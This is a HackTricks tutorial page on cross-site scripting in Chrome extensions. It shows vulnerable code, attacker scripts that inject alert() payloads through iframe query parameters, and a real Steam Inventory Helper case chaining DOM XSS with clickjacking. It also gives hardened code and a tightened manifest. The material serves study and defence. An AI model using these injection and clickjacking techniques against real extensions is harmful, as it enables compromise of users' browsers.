Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
The content script creates an iframe and passes data to it through the query parameters of the iframe's source URL:

```javascript
// Content script: the iframe element itself is created the same way as in the
// last snippet on this page (creation was not shown in the original excerpt)
let frame = document.createElement("iframe");
chrome.storage.local.get("message", result =>
{
  // Both the stored message and a fixed "explanation" URL travel as query parameters
  frame.src = chrome.runtime.getURL("message.html") +
    "?message=" + encodeURIComponent(result.message) +
    "&url=https://example.net/explanation";
});
document.body.appendChild(frame);
```

An exposed HTML page, message.html, accessible from the browser, contains code such as:
```javascript
$(() =>
{
  let params = new URLSearchParams(location.search);
  // "message" is inserted as HTML, so markup in it is rendered rather than shown as text
  $(document.body).append(params.get("message") + " <button>Explain</button>");
  $("body > button").click(() =>
  {
    // "url" is opened as-is, without any validation of its origin or scheme
    chrome.tabs.create({ url: params.get("url") });
  });
});
```

The malicious page executes a script like the following to replace the message with an XSS payload:
```javascript
setTimeout(() =>
{
  // The iframe injected by the content script is the last one in the attacker's page
  let frame = document.querySelector("iframe:last-child");
  let src = frame.src;
  // Remove existing query parameters
  src = src.replace(/\?.*/, "");
  // Add malicious query parameters
  src += "?message=" + encodeURIComponent("<script>alert('XSS')</script>");
  // Load into frame
  frame.src = src;
}, 1000);
```

A permissive Content Security Policy like

```json
"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"
```

will allow the execution of the JS code.
Another way to trigger the XSS at will is running:

```javascript
// The extension ID below is a placeholder; a web-accessible page can be framed directly by its chrome-extension:// URL
let frame = document.createElement("iframe");
frame.src = "chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?message="
  + encodeURIComponent("<script>alert('XSS')</script>");
document.body.appendChild(frame);
```

A real-world case is the Steam Inventory Helper extension (see the second reference below). The first vulnerability is a DOM-based Cross-site Scripting (XSS) vulnerability in /html/bookmarks.html; the following is the vulnerable JavaScript from the included bookmarks.js:
```javascript
$('#btAdd').click(function() {
  // User-controlled value from the text box
  var btname = $('#txtName').val();
  // Refuse duplicate button names
  if ($('.custom-button .name').filter(function() {
    return $(this).text() === btname;
  }).length) return false;
  var span = $('<span class="custom-button">');
  // btname is concatenated into an HTML string: no escaping, so markup (and scripts) are interpreted
  span.html('<span class="name">' + btname + '</span>');
  span.append('<a href="javascript:void(0)" title="remove">x</a>');
  span.attr('title', btname);
  span.data('id', (new Date().getTime()));
  $('div.custom-buttons .existing').append(span);
  save_options(); // persists the buttons; defined elsewhere in the extension
});
```

The above JavaScript takes the value of the txtName text box and uses string concatenation to build HTML, which is appended to the DOM via jQuery's append() function.
Normally, the Chrome extension Content Security Policy (CSP) should prevent this vulnerability from being exploited. However, because the policy was loosened with 'unsafe-eval' and because jQuery's DOM APIs are used, it could still be exploited: many of jQuery's DOM APIs route inline scripts through "globalEval()", which hands them to "eval()" as the content is appended to the DOM.
While this is a serious vulnerability, on its own its exploitation is fairly limited because of the user interaction required. The victim would have to open the page, paste a Cross-site Scripting (XSS) payload into the field, and click the "Add" button.
To better weaponize this vulnerability, a separate vulnerability (clickjacking) is used to bolster the attack.
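A hardened counterpart to the message.html handler above, added here as an example (not code from either writeup): the message is rendered with textContent and the url parameter is checked against an allowlist of origins before chrome.tabs.create is called. The same pattern, building nodes with DOM APIs instead of concatenating HTML into .append()/.html(), is the fix for the bookmarks.js handler as well; the allowlist of explanation origins is an assumption for the example.

```javascript
// Origins the extension is allowed to open from the "url" parameter (assumed for this example)
const ALLOWED_EXPLANATION_ORIGINS = new Set(["https://example.net"]);

// Return the raw "message" parameter (or null). It is treated purely as text:
// render() assigns it to textContent, so "<script>" stays literal characters
// and is never parsed as markup or evaluated.
function messageText(search) {
  return new URLSearchParams(search).get("message");
}

// Accept only absolute https URLs whose origin is on the allowlist; rejects
// javascript:, data:, chrome-extension:, relative strings and unknown hosts.
function safeExplanationUrl(search) {
  const raw = new URLSearchParams(search).get("url");
  if (!raw) return null;
  let parsed;
  try { parsed = new URL(raw); } catch (e) { return null; }
  if (parsed.protocol !== "https:") return null;
  return ALLOWED_EXPLANATION_ORIGINS.has(parsed.origin) ? parsed.href : null;
}

// Build the page with DOM APIs only: no HTML strings, no .html()/.append(string)
function render(doc, search) {
  const msg = doc.createElement("span");
  msg.textContent = messageText(search) ?? "";
  const btn = doc.createElement("button");
  btn.textContent = "Explain";
  const target = safeExplanationUrl(search);
  btn.disabled = target === null; // nothing to open if the url was rejected
  btn.addEventListener("click", () => {
    if (target !== null) chrome.tabs.create({ url: target });
  });
  doc.body.append(msg, " ", btn);
}

// Only run the DOM part inside a real page (the pure functions above work anywhere)
if (typeof document !== "undefined") {
  render(document, location.search);
}
```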
The following is an excerpt from the Chrome extension's manifest:

```json
...trimmed for brevity...
"web_accessible_resources": [
  "_locales/*",
  "bundle/*",
  "dist/*",
  "assets/*",
  "font/*",
  "html/bookmarks.html",
  "css/*.css",
  "js/*.js",
  "js/jquery/*.js",
  "js/lang/*"
],
...trimmed for brevity...
```

The above section shows that the extension casts a wide net with its web_accessible_resources policy.
Because /html/bookmarks.html is web accessible, it can also be framed and therefore exploited via clickjacking: the page is loaded in an iframe inside the attacker's web page, and DOM elements are overlaid on the frame to redress the layout, so the victim does not realize they are interacting with the extension page underneath. The following animation demonstrates this effect (see the animation in the original writeup).
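A tightened manifest, added as an example (not the extension's real manifest), with the two settings this page identifies as permissive corrected: no 'unsafe-eval' in the CSP, and web_accessible_resources limited to the static assets that content scripts actually inject, exposed only to the origins that need them. The Manifest V3 object form is used so exposure can be scoped by origin; html/bookmarks.html and the js/ bundles are deliberately absent, so websites can neither load nor frame them.

```json
{
  "manifest_version": 3,
  "content_security_policy": {
    "extension_pages": "script-src 'self'; object-src 'self'"
  },
  "web_accessible_resources": [
    {
      "resources": ["assets/*", "font/*"],
      "matches": ["https://example.net/*"]
    }
  ]
}
```

Manifest V3 rejects 'unsafe-eval' in extension_pages outright; in a Manifest V2 extension the equivalent is the string-form content_security_policy without it and a plain list of paths that omits the HTML pages and scripts.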
- https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/
- https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/